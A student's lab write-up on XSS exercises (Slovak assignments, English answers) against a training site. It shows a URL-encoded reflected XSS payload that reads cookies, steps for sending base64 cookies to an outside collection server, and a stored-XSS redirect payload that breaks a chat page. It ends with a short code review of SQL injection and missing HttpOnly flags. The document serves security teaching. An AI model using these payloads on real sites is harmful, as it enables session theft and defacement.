3.

1 Hello XSS
- Zistite, či váš prehliadač obsahuje XSS auditor a ako funguje.
(blokuje JS alebo celú stránku?)
- Stránka “hello.php” je zraniteľná na reflected XSS.
- Nájdite a zneužite zraniteľnosť na zobrazenie “hello world” správy cez javascript.
- Svoje finálne URL a zistenia zdokumentujte.

How does it work?

“The HTTP X-XSS-Protection response header is a feature of Internet Explorer, Chrome,

and Safari that stops pages from loading when they detect reflected cross -site scripting
(XSS) attacks. Although these protections are largely unnecessary in modern browsers
when sites implement a strong Content-Security-Policy that disables the use of inline
JavaScript ('unsafe-inline'), they can still provide protections for users of older web
browsers that don't yet support CSP.” [ 1]

My web browser is Chrome Version 94.0.4606.71 (Official Build) (64 -bit)

The XSS Auditor feature was removed in google chrome, chrome-status

Documentation:

1. Using the Vega software, I have done a scan over the page.
2. Intercept the request in Burpsuite proxy and pass the encoded Script

3. Result:
3.2 Exfiltration using reflected XSS
- Využite nájdenú zraniteľnosť z 3.1 na vykonanie reflected XSS útoku.
- Získajte pomocou javascriptu obsah používateľových cookies, zakódujte ich do
base64 reťazca a cez XMLHttpRequest (XHR) ich exfiltrujte cez GET request na:
https://dev.netvor.sk/ex/?ami=ais_login&data=exfiltrovane_data
- Javascript najskor otestujte a odlaďte na svojom prehliadači.
- Pre získanie exfitrovaných dát navštívte stránku:
https://dev.netvor.sk/ex/data/ais_login.txt
Finálnu útočnú URL vložte do formuláru https://bit.demo-cert.sk/sim/ - ktorý vám
odsimulujte “kliknutie” používateľa.
Získajte cookie obete (simulátora) z exfiltračného serveru.

XSS Reflected vulnerability reproducing:

After I encoded the previous script using URL encoder

Result:

https://xsaleh.bit.demo-
cert.sk/hello.php?name=%3Cscript%3E%0Aalert%28decodeURIComponent%28%0A%22
Location%3A%20%22%20%2B%20location%20%2B%20%22%5Cn%22%20%2B%20%0A%
22Location.hostname%3A%20%22%20%2B%20location.hostname%20%2B%2 0%22%5Cn
%22%20%2B%20%0A%22Location.href%3A%20%22%20%2B%20location.href%20%2B%
20%22%5Cn%22%20%2B%20%0A%22Location.pathname%3A%20%22%20%2B%20locati
on.pathname%20%2B%20%22%5Cn%22%20%2B%20%0A%22Location.protocol%3A%20
%22%20%2B%20location.protocol%20%2B%20%22%5 Cn%22%20%2B%20%0A%22docu
ment.cookie%3A%20%22%20%2B%20document.cookie%20%2B%20%22%5Cn%22%0A%
29%29%3C%2Fscript%3E

Click here
- I opened the URL encoder and wrote a simple JS script to retrieve some useful
information such as cookies, and using Burpsuite, I intercepted the request and
injected the encoded input as input for the attribute name.

- RESULT:
 - Coding Cookies to base64:

-
- After uploading to https://dev.netvor.sk

3.3 Break the web using stored XSS

- Stránka “chat.php” obsahuje stored XSS zranitelnosť.
- Nájdite deravú premennú, obídte anti-XSS ochranu v kóde a znefunkčnite stránku
pre budúcich návštevníkov.
- Extra body za kreatívnu formu znefunkčnenia :) (html/css/javacript/demo/...)

Blocking
I could block the functionality of chat.php by injecting

<img src=0 onerror=window.location.replace("https://xsaleh.bit.demo-cert.sk/");>

As an input for the message filed, which is going to redirect all the requests to
https://xsaleh.bit.demo-cert.sk/ page which in result means, chat.php will never be
reached or any file is using the messages.txt file
3.4 Code review

CWE ID Description No. Line

CWE-89 Improper Neutralization of Special Elements used in an SQL 12
Command ('SQL Injection')
CWE-287 Improper Authentication 11, 18
CWE-1004 Sensitive Cookie Without 'HttpOnly' Flag (cross site scripting) 18

Description:
The code is vulnerable to SQL injection as it’s explained in the previous table at line 12 o f
the code, using the parameters data without validation cause it, as a result we can have a
reflected XSS by invalidating the SQL statement and UNION it with INSERT SQL query to
insert a user which holds as login some JavaScript wrapped in html tag such <img> and I
will be executed at line 32.

In addition to SQL injection, it could be escalated to Impersonating some user by just

getting its login, and here we will be getting the token which will be serialized in our
browser.

Another way to get it is by getting the cookies object coz they ’re stored without using the
HTTP only flag, which gives the attacker the ability to take advanta ge of it and get it by
using some commands such document.cookie.

The best way to fix the SQL injection is validating the inputs and escape the special chars,
we should store cookies with HTTPonly flag on, and to solve the Impersontating issue, I
would recommend tracking the IP used to login and store as it’s going to check new
locations of users who are trying to sign-in.